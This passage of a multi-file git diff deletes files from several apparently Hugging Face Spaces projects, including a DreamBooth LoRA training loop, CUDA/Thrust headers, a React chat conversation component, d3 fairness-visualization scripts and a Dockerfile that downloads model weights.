attention layers) * (3x transformer layers) * (3x down blocks) = 18 - # => 32 layers - - # Set correct lora layers - lora_attn_procs = {} - for name in unet.attn_processors.keys(): - cross_attention_dim = None if name.endswith("attn1.processor") else unet.config.cross_attention_dim - if name.startswith("mid_block"): - hidden_size = unet.config.block_out_channels[-1] - elif name.startswith("up_blocks"): - block_id = int(name[len("up_blocks.")]) - hidden_size = list(reversed(unet.config.block_out_channels))[block_id] - elif name.startswith("down_blocks"): - block_id = int(name[len("down_blocks.")]) - hidden_size = unet.config.block_out_channels[block_id] - - lora_attn_procs[name] = LoRACrossAttnProcessor( - hidden_size=hidden_size, cross_attention_dim=cross_attention_dim - ) - - unet.set_attn_processor(lora_attn_procs) - lora_layers = AttnProcsLayers(unet.attn_processors) - - accelerator.register_for_checkpointing(lora_layers) - - if args.scale_lr: - args.learning_rate = ( - args.learning_rate * args.gradient_accumulation_steps * args.train_batch_size * accelerator.num_processes - ) - - # Enable TF32 for faster training on Ampere GPUs, - # cf https://pytorch.org/docs/stable/notes/cuda.html#tensorfloat-32-tf32-on-ampere-devices - if args.allow_tf32: - torch.backends.cuda.matmul.allow_tf32 = True - - if args.scale_lr: - args.learning_rate = ( - args.learning_rate * args.gradient_accumulation_steps * args.train_batch_size * accelerator.num_processes - ) - - # Use 8-bit Adam for lower memory usage or to fine-tune the model in 16GB GPUs - if args.use_8bit_adam: - try: - import bitsandbytes as bnb - except ImportError: - raise ImportError( - "To use 8-bit Adam, please install the bitsandbytes library: `pip install bitsandbytes`." - ) - - optimizer_class = bnb.optim.AdamW8bit - else: - optimizer_class = torch.optim.AdamW - - # Optimizer creation - optimizer = optimizer_class( - lora_layers.parameters(), - lr=args.learning_rate, - betas=(args.adam_beta1, args.adam_beta2), - weight_decay=args.adam_weight_decay, - eps=args.adam_epsilon, - ) - - # Dataset and DataLoaders creation: - train_dataset = DreamBoothDataset( - instance_data_root=args.instance_data_dir, - instance_prompt=args.instance_prompt, - class_data_root=args.class_data_dir if args.with_prior_preservation else None, - class_prompt=args.class_prompt, - tokenizer=tokenizer, - size=args.resolution, - center_crop=args.center_crop, - ) - - train_dataloader = torch.utils.data.DataLoader( - train_dataset, - batch_size=args.train_batch_size, - shuffle=True, - collate_fn=lambda examples: collate_fn(examples, args.with_prior_preservation), - num_workers=args.dataloader_num_workers, - ) - - # Scheduler and math around the number of training steps. - overrode_max_train_steps = False - num_update_steps_per_epoch = math.ceil(len(train_dataloader) / args.gradient_accumulation_steps) - if args.max_train_steps is None: - args.max_train_steps = args.num_train_epochs * num_update_steps_per_epoch - overrode_max_train_steps = True - - lr_scheduler = get_scheduler( - args.lr_scheduler, - optimizer=optimizer, - num_warmup_steps=args.lr_warmup_steps * args.gradient_accumulation_steps, - num_training_steps=args.max_train_steps * args.gradient_accumulation_steps, - num_cycles=args.lr_num_cycles, - power=args.lr_power, - ) - - # Prepare everything with our `accelerator`. - lora_layers, optimizer, train_dataloader, lr_scheduler = accelerator.prepare( - lora_layers, optimizer, train_dataloader, lr_scheduler - ) - - # We need to recalculate our total training steps as the size of the training dataloader may have changed. - num_update_steps_per_epoch = math.ceil(len(train_dataloader) / args.gradient_accumulation_steps) - if overrode_max_train_steps: - args.max_train_steps = args.num_train_epochs * num_update_steps_per_epoch - # Afterwards we recalculate our number of training epochs - args.num_train_epochs = math.ceil(args.max_train_steps / num_update_steps_per_epoch) - - # We need to initialize the trackers we use, and also store our configuration. - # The trackers initializes automatically on the main process. - if accelerator.is_main_process: - accelerator.init_trackers("dreambooth-lora", config=vars(args)) - - # Train! - total_batch_size = args.train_batch_size * accelerator.num_processes * args.gradient_accumulation_steps - - logger.info("***** Running training *****") - logger.info(f" Num examples = {len(train_dataset)}") - logger.info(f" Num batches each epoch = {len(train_dataloader)}") - logger.info(f" Num Epochs = {args.num_train_epochs}") - logger.info(f" Instantaneous batch size per device = {args.train_batch_size}") - logger.info(f" Total train batch size (w. parallel, distributed & accumulation) = {total_batch_size}") - logger.info(f" Gradient Accumulation steps = {args.gradient_accumulation_steps}") - logger.info(f" Total optimization steps = {args.max_train_steps}") - global_step = 0 - first_epoch = 0 - - # Potentially load in the weights and states from a previous save - if args.resume_from_checkpoint: - if args.resume_from_checkpoint != "latest": - path = os.path.basename(args.resume_from_checkpoint) - else: - # Get the mos recent checkpoint - dirs = os.listdir(args.output_dir) - dirs = [d for d in dirs if d.startswith("checkpoint")] - dirs = sorted(dirs, key=lambda x: int(x.split("-")[1])) - path = dirs[-1] if len(dirs) > 0 else None - - if path is None: - accelerator.print( - f"Checkpoint '{args.resume_from_checkpoint}' does not exist. Starting a new training run." - ) - args.resume_from_checkpoint = None - else: - accelerator.print(f"Resuming from checkpoint {path}") - accelerator.load_state(os.path.join(args.output_dir, path)) - global_step = int(path.split("-")[1]) - - resume_global_step = global_step * args.gradient_accumulation_steps - first_epoch = global_step // num_update_steps_per_epoch - resume_step = resume_global_step % (num_update_steps_per_epoch * args.gradient_accumulation_steps) - - # Only show the progress bar once on each machine. - progress_bar = tqdm(range(global_step, args.max_train_steps), disable=not accelerator.is_local_main_process) - progress_bar.set_description("Steps") - - for epoch in range(first_epoch, args.num_train_epochs): - unet.train() - for step, batch in enumerate(train_dataloader): - # Skip steps until we reach the resumed step - if args.resume_from_checkpoint and epoch == first_epoch and step < resume_step: - if step % args.gradient_accumulation_steps == 0: - progress_bar.update(1) - continue - - with accelerator.accumulate(unet): - # Convert images to latent space - latents = vae.encode(batch["pixel_values"].to(dtype=weight_dtype)).latent_dist.sample() - latents = latents * 0.18215 - - # Sample noise that we'll add to the latents - noise = torch.randn_like(latents) - bsz = latents.shape[0] - # Sample a random timestep for each image - timesteps = torch.randint(0, noise_scheduler.config.num_train_timesteps, (bsz,), device=latents.device) - timesteps = timesteps.long() - - # Add noise to the latents according to the noise magnitude at each timestep - # (this is the forward diffusion process) - noisy_latents = noise_scheduler.add_noise(latents, noise, timesteps) - - # Get the text embedding for conditioning - encoder_hidden_states = text_encoder(batch["input_ids"])[0] - - # Predict the noise residual - model_pred = unet(noisy_latents, timesteps, encoder_hidden_states).sample - - # Get the target for loss depending on the prediction type - if noise_scheduler.config.prediction_type == "epsilon": - target = noise - elif noise_scheduler.config.prediction_type == "v_prediction": - target = noise_scheduler.get_velocity(latents, noise, timesteps) - else: - raise ValueError(f"Unknown prediction type {noise_scheduler.config.prediction_type}") - - if args.with_prior_preservation: - # Chunk the noise and model_pred into two parts and compute the loss on each part separately. - model_pred, model_pred_prior = torch.chunk(model_pred, 2, dim=0) - target, target_prior = torch.chunk(target, 2, dim=0) - - # Compute instance loss - loss = F.mse_loss(model_pred.float(), target.float(), reduction="mean") - - # Compute prior loss - prior_loss = F.mse_loss(model_pred_prior.float(), target_prior.float(), reduction="mean") - - # Add the prior loss to the instance loss. - loss = loss + args.prior_loss_weight * prior_loss - else: - loss = F.mse_loss(model_pred.float(), target.float(), reduction="mean") - - accelerator.backward(loss) - if accelerator.sync_gradients: - params_to_clip = lora_layers.parameters() - accelerator.clip_grad_norm_(params_to_clip, args.max_grad_norm) - optimizer.step() - lr_scheduler.step() - optimizer.zero_grad() - - # Checks if the accelerator has performed an optimization step behind the scenes - if accelerator.sync_gradients: - progress_bar.update(1) - global_step += 1 - - if global_step % args.checkpointing_steps == 0: - if accelerator.is_main_process: - save_path = os.path.join(args.output_dir, f"checkpoint-{global_step}") - accelerator.save_state(save_path) - logger.info(f"Saved state to {save_path}") - - logs = {"loss": loss.detach().item(), "lr": lr_scheduler.get_last_lr()[0]} - progress_bar.set_postfix(**logs) - accelerator.log(logs, step=global_step) - - if global_step >= args.max_train_steps: - break - - if args.validation_prompt is not None and epoch % args.validation_epochs == 0: - logger.info( - f"Running validation... \n Generating {args.num_validation_images} images with prompt:" - f" {args.validation_prompt}." - ) - # create pipeline - pipeline = DiffusionPipeline.from_pretrained( - args.pretrained_model_name_or_path, - unet=accelerator.unwrap_model(unet), - text_encoder=accelerator.unwrap_model(text_encoder), - revision=args.revision, - torch_dtype=weight_dtype, - ) - pipeline.scheduler = DPMSolverMultistepScheduler.from_config(pipeline.scheduler.config) - pipeline = pipeline.to(accelerator.device) - pipeline.set_progress_bar_config(disable=True) - - # run inference - generator = torch.Generator(device=accelerator.device).manual_seed(args.seed) - prompt = args.num_validation_images * [args.validation_prompt] - images = pipeline(prompt, num_inference_steps=25, generator=generator).images - - for tracker in accelerator.trackers: - if tracker.name == "tensorboard": - np_images = np.stack([np.asarray(img) for img in images]) - tracker.writer.add_images("validation", np_images, epoch, dataformats="NHWC") - if tracker.name == "wandb": - tracker.log( - { - "validation": [ - wandb.Image(image, caption=f"{i}: {args.validation_prompt}") - for i, image in enumerate(images) - ] - } - ) - - del pipeline - torch.cuda.empty_cache() - - # Save the lora layers - accelerator.wait_for_everyone() - if accelerator.is_main_process: - unet = unet.to(torch.float32) - unet.save_attn_procs(args.output_dir) - - # Final inference - # Load previous pipeline - pipeline = DiffusionPipeline.from_pretrained( - args.pretrained_model_name_or_path, revision=args.revision, torch_dtype=weight_dtype - ) - pipeline.scheduler = DPMSolverMultistepScheduler.from_config(pipeline.scheduler.config) - pipeline = pipeline.to(accelerator.device) - - # load attention processors - pipeline.unet.load_attn_procs(args.output_dir) - - # run inference - if args.validation_prompt and args.num_validation_images > 0: - generator = torch.Generator(device=accelerator.device).manual_seed(args.seed) if args.seed else None - prompt = args.num_validation_images * [args.validation_prompt] - images = pipeline(prompt, num_inference_steps=25, generator=generator).images - - test_image_dir = Path(args.output_dir) / 'test_images' - test_image_dir.mkdir() - for i, image in enumerate(images): - out_path = test_image_dir / f'image_{i}.png' - image.save(out_path) - - for tracker in accelerator.trackers: - if tracker.name == "tensorboard": - np_images = np.stack([np.asarray(img) for img in images]) - tracker.writer.add_images("test", np_images, epoch, dataformats="NHWC") - if tracker.name == "wandb": - tracker.log( - { - "test": [ - wandb.Image(image, caption=f"{i}: {args.validation_prompt}") - for i, image in enumerate(images) - ] - } - ) - - if args.push_to_hub: - save_model_card( - repo_name, - images=images, - base_model=args.pretrained_model_name_or_path, - prompt=args.instance_prompt, - repo_folder=args.output_dir, - ) - repo.push_to_hub(commit_message="End of training", blocking=False, auto_lfs_prune=True) - - accelerator.end_training() - - -if __name__ == "__main__": - args = parse_args() - main(args) diff --git a/spaces/lvwerra/license-static/README.md b/spaces/lvwerra/license-static/README.md deleted file mode 100644 index 642714cf7aa0e52fb69c17dc95e040f1629c1054..0000000000000000000000000000000000000000 --- a/spaces/lvwerra/license-static/README.md +++ /dev/null @@ -1,10 +0,0 @@ ---- -title: License Static -emoji: 💻 -colorFrom: indigo -colorTo: indigo -sdk: static -pinned: false ---- - -Check out the configuration reference at https://huggingface.co/docs/hub/spaces-config-reference diff --git a/spaces/ma-xu/LIVE/thrust/dependencies/cub/experimental/histogram/histogram_cub.h b/spaces/ma-xu/LIVE/thrust/dependencies/cub/experimental/histogram/histogram_cub.h deleted file mode 100644 index 07c2e4aa2db26a2f788003e950cb8c82f40a7846..0000000000000000000000000000000000000000 --- a/spaces/ma-xu/LIVE/thrust/dependencies/cub/experimental/histogram/histogram_cub.h +++ /dev/null @@ -1,109 +0,0 @@ -/****************************************************************************** - * Copyright (c) 2011-2018, NVIDIA CORPORATION. All rights reserved. - * - * Redistribution and use in source and binary forms, with or without - * modification, are permitted provided that the following conditions are met: - * * Redistributions of source code must retain the above copyright - * notice, this list of conditions and the following disclaimer. - * * Redistributions in binary form must reproduce the above copyright - * notice, this list of conditions and the following disclaimer in the - * documentation and/or other materials provided with the distribution. - * * Neither the name of the NVIDIA CORPORATION nor the - * names of its contributors may be used to endorse or promote products - * derived from this software without specific prior written permission. - * - * THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND - * ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED - * WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE - * DISCLAIMED. IN NO EVENT SHALL NVIDIA CORPORATION BE LIABLE FOR ANY - * DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES - * (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; - * LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND - * ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT - * (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS - * SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. - * - ******************************************************************************/ - -#include - -using namespace cub; - -template < - int NUM_CHANNELS, - int ACTIVE_CHANNELS, - int NUM_BINS, - typename PixelType> -double run_cub_histogram( - PixelType *d_image, - int width, - int height, - unsigned int *d_hist, - bool is_warmup) -{ - enum { - is_float = Equals::VALUE, - }; - - typedef typename If::Type SampleT; // Sample type - typedef typename If::Type LevelT; // Level type (uint32 for uchar) - - // Setup data structures - unsigned int* d_histogram[ACTIVE_CHANNELS]; - int num_levels[ACTIVE_CHANNELS]; ///< [in] The number of boundaries (levels) for delineating histogram samples in each active channel. Implies that the number of bins for channeli is num_levels[i] - 1. - LevelT lower_level[ACTIVE_CHANNELS]; ///< [in] The lower sample value bound (inclusive) for the lowest histogram bin in each active channel. - LevelT upper_level[ACTIVE_CHANNELS]; ///< [in] The upper sample value bound (exclusive) for the highest histogram bin in each active channel. - - for (int CHANNEL = 0; CHANNEL < ACTIVE_CHANNELS; ++CHANNEL) - { - d_histogram[CHANNEL] = d_hist + (CHANNEL * NUM_BINS); - num_levels[CHANNEL] = NUM_BINS + 1; - lower_level[CHANNEL] = 0; - upper_level[CHANNEL] = (is_float) ? 1 : 256; - } - - // Allocate temporary storage - size_t temp_storage_bytes = 0; - void *d_temp_storage = NULL; - - SampleT* d_image_samples = (SampleT*) d_image; - - // Get amount of temporary storage needed - DeviceHistogram::MultiHistogramEven( - d_temp_storage, - temp_storage_bytes, - d_image_samples, - d_histogram, - num_levels, - lower_level, - upper_level, - width * height, - (cudaStream_t) 0, - is_warmup); - - cudaMalloc(&d_temp_storage, temp_storage_bytes); - - GpuTimer gpu_timer; - gpu_timer.Start(); - - // Compute histogram - DeviceHistogram::MultiHistogramEven( - d_temp_storage, - temp_storage_bytes, - d_image_samples, - d_histogram, - num_levels, - lower_level, - upper_level, - width * height, - (cudaStream_t) 0, - is_warmup); - - gpu_timer.Stop(); - float elapsed_millis = gpu_timer.ElapsedMillis(); - - cudaFree(d_temp_storage); - - return elapsed_millis; -} - diff --git a/spaces/ma-xu/LIVE/thrust/thrust/system/omp/detail/generate.h b/spaces/ma-xu/LIVE/thrust/thrust/system/omp/detail/generate.h deleted file mode 100644 index f907b6acc079577642c446d6f0736073defc44b8..0000000000000000000000000000000000000000 --- a/spaces/ma-xu/LIVE/thrust/thrust/system/omp/detail/generate.h +++ /dev/null @@ -1,23 +0,0 @@ -/* - * Copyright 2008-2013 NVIDIA Corporation - * - * Licensed under the Apache License, Version 2.0 (the "License"); - * you may not use this file except in compliance with the License. - * You may obtain a copy of the License at - * - * http://www.apache.org/licenses/LICENSE-2.0 - * - * Unless required by applicable law or agreed to in writing, software - * distributed under the License is distributed on an "AS IS" BASIS, - * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. - * See the License for the specific language governing permissions and - * limitations under the License. - */ - -#pragma once - -#include - -// this system inherits generate -#include - diff --git a/spaces/ma-xu/LIVE/thrust/thrust/system/tbb/detail/reverse.h b/spaces/ma-xu/LIVE/thrust/thrust/system/tbb/detail/reverse.h deleted file mode 100644 index 1f3e0325e257c301215e62c690837433ae24c30c..0000000000000000000000000000000000000000 --- a/spaces/ma-xu/LIVE/thrust/thrust/system/tbb/detail/reverse.h +++ /dev/null @@ -1,23 +0,0 @@ -/* - * Copyright 2008-2013 NVIDIA Corporation - * - * Licensed under the Apache License, Version 2.0 (the "License"); - * you may not use this file except in compliance with the License. - * You may obtain a copy of the License at - * - * http://www.apache.org/licenses/LICENSE-2.0 - * - * Unless required by applicable law or agreed to in writing, software - * distributed under the License is distributed on an "AS IS" BASIS, - * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. - * See the License for the specific language governing permissions and - * limitations under the License. - */ - -#pragma once - -#include - -// this system inherits reverse -#include - diff --git a/spaces/matthoffner/chatbot-mini/components/Chatbar/components/Conversation.tsx b/spaces/matthoffner/chatbot-mini/components/Chatbar/components/Conversation.tsx deleted file mode 100644 index b9c57393c045baf710e7d1cd24aa57a3a09eb68a..0000000000000000000000000000000000000000 --- a/spaces/matthoffner/chatbot-mini/components/Chatbar/components/Conversation.tsx +++ /dev/null @@ -1,168 +0,0 @@ -import { - IconCheck, - IconMessage, - IconPencil, - IconTrash, - IconX, -} from '@tabler/icons-react'; -import { - DragEvent, - KeyboardEvent, - MouseEventHandler, - useContext, - useEffect, - useState, -} from 'react'; - -import { Conversation } from '@/types/chat'; - -import HomeContext from '@/pages/api/home/home.context'; - -import SidebarActionButton from '@/components/Buttons/SidebarActionButton'; -import ChatbarContext from '@/components/Chatbar/Chatbar.context'; - -interface Props { - conversation: Conversation; -} - -export const ConversationComponent = ({ conversation }: Props) => { - const { - state: { selectedConversation, messageIsStreaming }, - handleSelectConversation, - handleUpdateConversation, - } = useContext(HomeContext); - - const { handleDeleteConversation } = useContext(ChatbarContext); - - const [isDeleting, setIsDeleting] = useState(false); - const [isRenaming, setIsRenaming] = useState(false); - const [renameValue, setRenameValue] = useState(''); - - const handleEnterDown = (e: KeyboardEvent) => { - if (e.key === 'Enter') { - e.preventDefault(); - selectedConversation && handleRename(selectedConversation); - } - }; - - const handleDragStart = ( - e: DragEvent, - conversation: Conversation, - ) => { - if (e.dataTransfer) { - e.dataTransfer.setData('conversation', JSON.stringify(conversation)); - } - }; - - const handleRename = (conversation: Conversation) => { - if (renameValue.trim().length > 0) { - handleUpdateConversation(conversation, { - key: 'name', - value: renameValue, - }); - setRenameValue(''); - setIsRenaming(false); - } - }; - - const handleConfirm: MouseEventHandler = (e) => { - e.stopPropagation(); - if (isDeleting) { - handleDeleteConversation(conversation); - } else if (isRenaming) { - handleRename(conversation); - } - setIsDeleting(false); - setIsRenaming(false); - }; - - const handleCancel: MouseEventHandler = (e) => { - e.stopPropagation(); - setIsDeleting(false); - setIsRenaming(false); - }; - - const handleOpenRenameModal: MouseEventHandler = (e) => { - e.stopPropagation(); - setIsRenaming(true); - selectedConversation && setRenameValue(selectedConversation.name); - }; - const handleOpenDeleteModal: MouseEventHandler = (e) => { - e.stopPropagation(); - setIsDeleting(true); - }; - - useEffect(() => { - if (isRenaming) { - setIsDeleting(false); - } else if (isDeleting) { - setIsRenaming(false); - } - }, [isRenaming, isDeleting]); - - return ( -
          - {isRenaming && selectedConversation?.id === conversation.id ? ( -
          - - setRenameValue(e.target.value)} - onKeyDown={handleEnterDown} - autoFocus - /> -
          - ) : ( - - )} - - {(isDeleting || isRenaming) && - selectedConversation?.id === conversation.id && ( -
          - - - - - - -
          - )} - - {selectedConversation?.id === conversation.id && - !isDeleting && - !isRenaming && ( -
          - - - - - - -
          - )} -
          - ); -}; diff --git a/spaces/mehzhats/dogbreedidentifier/README.md b/spaces/mehzhats/dogbreedidentifier/README.md deleted file mode 100644 index 545ddac449be90b2233acb3aac1ab3288afda7ba..0000000000000000000000000000000000000000 --- a/spaces/mehzhats/dogbreedidentifier/README.md +++ /dev/null @@ -1,13 +0,0 @@ ---- -title: Dogbreedidentifier -emoji: 🐨 -colorFrom: blue -colorTo: green -sdk: gradio -sdk_version: 3.4.1 -app_file: app.py -pinned: false -license: ecl-2.0 ---- - -Check out the configuration reference at https://huggingface.co/docs/hub/spaces-config-reference diff --git a/spaces/merve/hidden-bias/server-side/fill-in-the-blank/scatter-plot-colab/spearman-distribution/init.js b/spaces/merve/hidden-bias/server-side/fill-in-the-blank/scatter-plot-colab/spearman-distribution/init.js deleted file mode 100644 index 45e4fafb63a667109fdf81c03ed1d375027ae462..0000000000000000000000000000000000000000 --- a/spaces/merve/hidden-bias/server-side/fill-in-the-blank/scatter-plot-colab/spearman-distribution/init.js +++ /dev/null @@ -1,168 +0,0 @@ -/* Copyright 2021 Google LLC. All Rights Reserved. - -Licensed under the Apache License, Version 2.0 (the "License"); -you may not use this file except in compliance with the License. -You may obtain a copy of the License at - - http://www.apache.org/licenses/LICENSE-2.0 - -Unless required by applicable law or agreed to in writing, software -distributed under the License is distributed on an "AS IS" BASIS, -WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -See the License for the specific language governing permissions and -limitations under the License. -==============================================================================*/ - - -// console.clear() - -window.init = function(){ - var initFns = [window.initUtil, window.initScatter, window.initPair] - if (!initFns.every(d => d)) return - - window.util = initUtil() - - window.tidy = d3.csvParse(python_data.tidyCSV, d => { - return { - e0: +d.e0, - e1: +d.e1, - i0: +d.i0, - i1: +d.i1, - tokenIndex: +d.tokenIndex, - sentenceIndex: +d.sentenceIndex, - } - }) - - var bySentence = d3.nestBy(tidy, d => d.sentenceIndex) - bySentence.forEach(sent => { - sent.sentenceIndex = +sent.key - sent.s0 = python_data.sentences[sent.sentenceIndex].s0 - sent.s1 = python_data.sentences[sent.sentenceIndex].s1 - sent.orig = python_data.sentences[sent.sentenceIndex].orig - - sent.corrA = ss.sampleCorrelation(sent.map(d => d.i0), sent.map(d => d.i1)) - // sent.corrA = ss.sampleCorrelation(sent.map(d => d.e0), sent.map(d => d.e1)) - }) - - var sel = d3.select('.container').html(` -
          -
          -
          -
          -
          -
          -
          - `) - .st({width: 1100}) - d3.selectAll('.left,.right').st({width: 500, display: 'inline-block', verticalAlign: 'top'}) - - function initBeeswarm(bySentence, sel){ - var c = d3.conventions({ - sel: sel.append('div'), - height: 80, - totalWidth: 400, - margin: {left: 0, top: 18} - }) - - c.x.domain(d3.extent(bySentence.map(d => +d.corrA))).nice() - // c.x.domain([0, 1]) - c.xAxis.ticks(5) - d3.drawAxis(c) - util.ggPlotBg(c) - c.svg.select('.y').remove() - c.svg.selectAll('.tick').st({display: 'block'}) - - var simulation = d3.forceSimulation(bySentence) - .force("x", d3.forceX(d => c.x(d.corrA)).strength(1)) - .force("y", d3.forceY(c.height / 2)) - .force("collide", d3.forceCollide(4)) - .stop() - - for (var i = 0; i < 120; ++i) simulation.tick() - - c.svg.append('text').text('text') - .text('Distribution of Spearman Correlation Coefficients') - .at({dy: -5, fontWeight: 600}) - - c.svg.appendMany('circle.sentence', bySentence) - .translate(d => [d.x, d.y]) - .at({ - r: 3, - fill: 'none', - stroke: '#000' - }) - .on('mouseover', setSentenceAsPair) - } - initBeeswarm(bySentence, d3.select('.beeswarm')) - - - function initList(bySentence, sel){ - // var sentenceSel = sel.st({height: 500, overflowY: 'scroll', cursor: 'default'}) - // .appendMany('div.sentence', _.sortBy(bySentence, d => d.corrA)) - // .on('mouseover', setSentenceAsPair) - // .st({padding: 2, fontSize: 12}) - - // sentenceSel.append('span') - // .text(d => (d3.format('+.2f')(d.corrA)).replace('0.', '.')) - // .st({marginRight: 10, color: '#aaa'}) - - // sentenceSel.append('span') - // .text(d => d.orig.replace('[', '').replace(']', '')) - - var tableSel = sel - .st({height: 470 + 17, overflowY: 'scroll', cursor: 'default', position: 'relative', left: -40}) - .append('table') - .st({fontSize: 12}) - - tableSel.append('tr.header') - .html(` -
          - - `) - - var rowSel = tableSel - .appendMany('tr.sentence', _.sortBy(bySentence, d => d.corrA)) - .on('mouseover', setSentenceAsPair) - .st({padding: 2, fontSize: 12}) - .html(d => ` - - - `) - } - initList(bySentence, d3.select('.list')) - - - - function setSentenceAsPair(s){ - s.e0 = d3.range(python_data.vocab.length).map(d => -Infinity) - s.e1 = d3.range(python_data.vocab.length).map(d => -Infinity) - s.forEach(d => { - s.e0[d.tokenIndex] = d.e0 - s.e1[d.tokenIndex] = d.e1 - }) - - s.label0 = s.s0 - s.label1 = s.s1 - s.vocab = python_data.vocab - s.count = python_settings.count || 150 - s.isDifference = python_settings.isDifference - - var sel = d3.select('.pair').html('').st({width: 400}) - - initPair(s, sel) - - d3.selectAll('.sentence').classed('active', d => d == s) - - d3.selectAll('div.sentence').filter(d => d == s) - .each(function(){ - this.scrollIntoView({ block: 'nearest', inline: 'nearest'}) - }) - } - - setSentenceAsPair(bySentence[0]) - -} - - -window.init() - diff --git a/spaces/merve/measuring-fairness/server-side/fill-in-the-blank/py/Dockerfile b/spaces/merve/measuring-fairness/server-side/fill-in-the-blank/py/Dockerfile deleted file mode 100644 index 8fd3b0a4a1776bd3fe714d73e1e3be6107d66272..0000000000000000000000000000000000000000 --- a/spaces/merve/measuring-fairness/server-side/fill-in-the-blank/py/Dockerfile +++ /dev/null @@ -1,22 +0,0 @@ -# Use the official lightweight Python image. -# https://hub.docker.com/_/python -FROM python:3.9-slim - -# Allow statements and log messages to immediately appear in the Knative logs -ENV PYTHONUNBUFFERED True - -# Copy local code to the container image. -ENV APP_HOME /app -WORKDIR $APP_HOME -COPY . ./ - -# Copy requirements.txt to the docker image and install packages -COPY requirements.txt / -RUN pip install -r requirements.txt - -# Download models -ADD https://storage.googleapis.com/uncertainty-over-space/zari-bert-cda/pytorch_model.bin zari-bert-cda/pytorch_model.bin -ADD https://huggingface.co/bert-large-uncased-whole-word-masking/resolve/main/pytorch_model.bin bert-large-uncased-whole-word-masking/pytorch_model.bin - -# Run the web service on container startup. -CMD exec gunicorn --bind :$PORT --workers 1 --threads 1 --timeout 0 main:app diff --git a/spaces/merve/measuring-fairness/source/measuring-fairness/mini.js b/spaces/merve/measuring-fairness/source/measuring-fairness/mini.js deleted file mode 100644 index 51e81b909d66e7a0b45f54b318a0b88a95fdb217..0000000000000000000000000000000000000000 --- a/spaces/merve/measuring-fairness/source/measuring-fairness/mini.js +++ /dev/null @@ -1,205 +0,0 @@ -/* Copyright 2020 Google LLC. All Rights Reserved. - -Licensed under the Apache License, Version 2.0 (the "License"); -you may not use this file except in compliance with the License. -You may obtain a copy of the License at - - http://www.apache.org/licenses/LICENSE-2.0 - -Unless required by applicable law or agreed to in writing, software -distributed under the License is distributed on an "AS IS" BASIS, -WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -See the License for the specific language governing permissions and -limitations under the License. -==============================================================================*/ - - - - - -window.makeMini = function(){ - - var s = 10 - var sScale = ([a, b]) => [s*a, s*b] - - var miniSel = d3.selectAll('.mini').html('').each(addMini).st({overflow: 'visible'}) - - var cColors = { - true: {true: colors.sick, false: lcolors.sick}, - false: {true: colors.well, false: lcolors.well} - } - var rColors = { - true: {true: lcolors.sick, false: llcolors.sick}, - false: {true: lcolors.well, false: llcolors.well} - } - - - function addMini(){ - var miniSel = d3.select(this) - - var type = miniSel.attr('type') - var sex = miniSel.attr('sex') - var isAll = sex == 'all' - - miniSel.st({marginBottom: sex == 'male' ? 30 : 0}) - - var data = students - .filter(d => isAll ? true : sex == 'male' ? d.isMale : !d.isMale) - - var topDatum = {} - var botDatum = {} - - if (type == 'fp'){ - topDatum.opacity = d => d.grade > d.threshold && d.isSick - botDatum.opacity = d => d.isSick - } else { - topDatum.opacity = d => d.grade > d.threshold && d.isSick - botDatum.opacity = d => d.grade > d.threshold - } - - - - var top = -s*nCols/2 + 10 - if (!isAll) top /= 2 - addGrid(miniSel.append('span'), topDatum) - miniSel.append('span.equation').text('÷').st({top, fontWeight: '', fontSize: 20}) - addGrid(miniSel.append('span'), botDatum) - miniSel.append('span.equation').text('=').st({top, fontWeight: '', fontSize: 20}) - - if (!isAll){ - var sexStr = sex == 'male' ? 'children' : 'adults' - - var coStr = `of ${sexStr}
          testing positive
          are sick` - var fpStr = `of ${sexStr}
          who are sick
          test positive` - miniSel.st({position: 'relative'}) - .append('div.axis') - .st({position: 'absolute', right: -9, textAlign: 'center', width: 95, lineHeight: 14, bottom: -15}) - .html(type == 'fp' ? fpStr : coStr) - - } - - var percentSel = miniSel.append('span.equation').st({top, marginLeft: 0}) - - function update(){ - topDatum.update() - botDatum.update() - - var percent = d3.sum(data, topDatum.opacity)/d3.sum(data, botDatum.opacity) - percentSel.text(d3.format('.0%')(percent)) - } - - miniSel.datum({update}) - - - function addGrid(gridSel, datum){ - var {opacity} = datum - - var width = s*nCols - var height = s*nCols*(isAll ? 1 : .5) - var svg = gridSel.append('svg').at({width, height}) - - var callSickSel = svg.append('rect') - .at({width, height, fill: lcolors.sick}) - - var callWellPath = svg.append('path') - .at({width, height, fill: lcolors.well}) - - - var personSel = svg.appendMany('g', data) - .translate(d => sScale(d.pos[isAll ? 'allIJ' : 'sexGroupIJ'])) - - var pad = 0 - // var rectSel = personSel.append('rect') - // .at({ - // height: s - pad, - // width: s - pad, - // // stroke: '#666', - // // strokeWidth: .1, - // }) - - - var circleSel = personSel.append('circle') - .at({r: s/4, cx: s/2 - pad/2, cy: s/2 - pad/2, fill: d => d.isSick ? colors.sick : '#777'}) - - if (!isAll){ - svg.append('path') - .translate([-1, -5]) - .at({stroke: colors.sick, d: 'M 0 0 H ' + (sex == 'male' ? 8 : 4)*s}) - } - - var geodata = {type: 'FeatureCollection'} - geodata.features = data.map(d => { - var [x, y] = sScale(d.pos[isAll ? 'allIJ' : 'sexGroupIJ']) - return { - type: 'Feature', - geometry: { - type: 'Polygon', - coordinates: [ - [[x, y], [x, y + s], [x + s, y + s], [x + s, y], [x, y]] - ] - }, - properties: {d}, - } - }) - - var topology = topojson.topology({boxes: geodata}) - var geowrap = topojson.feature(topology, topology.objects.boxes) - var path = d3.geoPath() - - var hiddenPath = svg.append('path') - 